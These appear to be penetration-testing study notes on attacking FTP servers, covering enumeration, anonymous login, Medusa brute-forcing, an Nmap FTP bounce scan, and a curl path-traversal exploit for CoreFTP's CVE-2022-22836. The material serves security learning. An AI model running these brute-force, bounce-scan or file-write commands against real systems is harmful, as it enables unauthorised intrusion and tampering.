2.FTP

Manual FTP Connection

ftp <target_IP>

Netcat FTP Connection

nc <target_IP> 21

Anonymous Login (FTP Client)

ftp <target_IP>
Username: anonymous
Password: (Press Enter)

Brute-Force (Medusa)

medusa -u <username> -P <password_list> -h <target_IP> -M ftp

FTP Bounce Attack (Nmap)

nmap -Pn -v -n -p <target_port> -b anonymous:password@<ftp_server_IP> <internal_target_IP>

CoreFTP Arbitrary File Write (curl)

curl -k -X PUT -H "Host: <target_IP>" --basic -u <username>:<password> --data-binary "Payload" --path-as-is https://<target_IP>/../../../../../../<filename>

FTP Client Commands (Post-Login)

ls                     # List directory contents
cd <directory>         # Change directory
get <filename>         # Download a single file
mget <filename1> <filename2> # Download multiple files
put <local_filename>   # Upload a single file
mput <local_filename1> <local_filename2> # Upload multiple files
help                   # Show help for FTP commands

. FTP Basics

• Function:

  • File transfer between computers.

  • Directory and file operations (list, rename, delete).

• Port: TCP/21.

• Attack Vectors:

  • Misconfigurations (anonymous access, excessive privileges).

  • Exploiting known vulnerabilities.

  • Discovering new vulnerabilities.

II. Enumeration

• Nmap:

  • -sC (default scripts): ftp-anon script (anonymous login check).

  • -sV (version enumeration): FTP banner, version info.

  • Example: nmap -sC -sV -p 21 <target_IP>

• Manual Interaction:

  • ftp client.

  • nc (netcat).

III. Misconfigurations

• Anonymous Authentication:

  • Username: anonymous, no password.

  • Risks: Sensitive data access, malicious file uploads.

• Access Control:

  • Incorrect read/write permissions.

IV. Protocol-Specific Attacks

• Brute-Forcing:

  • Tools: Medusa (medusa -u <user> -P <passlist> -h <target> -M ftp).

  • Note: Password spraying is more effective.

• FTP Bounce Attack:

  • Using an FTP server to scan internal network devices.

  • Nmap: -b anonymous:password@<FTP_server_IP> <internal_target_IP>.

  • Modern servers have protections, but misconfigurations exist.

V. Latest FTP Vulnerabilities (CVE-2022-22836 - CoreFTP)

• Vulnerability:

  • Authenticated directory/path traversal.

  • Arbitrary file write.

• Attack Method:

  • HTTP PUT request with directory traversal characters (../).

• Exploitation:

  • curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops

• SPPD Breakdown:

  • Directory Traversal:

    • Source: Malicious HTTP PUT request.

    • Process: Misinterprets path.

    • Privileges: Bypass restrictions.

    • Destination: Local system (traversed directory).

  • Arbitrary File Write:

    • Source: Filename and content.

    • Process: Writes content.

    • Privileges: Allowed due to traversal.

    • Destination: Arbitrary file on the local system.

Points for Consideration:

• Active vs. Passive FTP: Briefly mention the difference and security implications.

• Secure FTP: Discuss SFTP and FTPS and their advantages.

• FTP Tools: Expand on tools like lftp and FileZilla (for client side), and also vsftpd, and proftpd (for server side).

• Real-World Examples: Add more examples of FTP misconfigurations and exploits.

• Mitigation: Provide more detailed mitigation strategies for FTP vulnerabilities.

• More Nmap script examples: There are many more useful ftp Nmap scripts.

• More curl usage: There are many more ways to use curl to interact with FTP.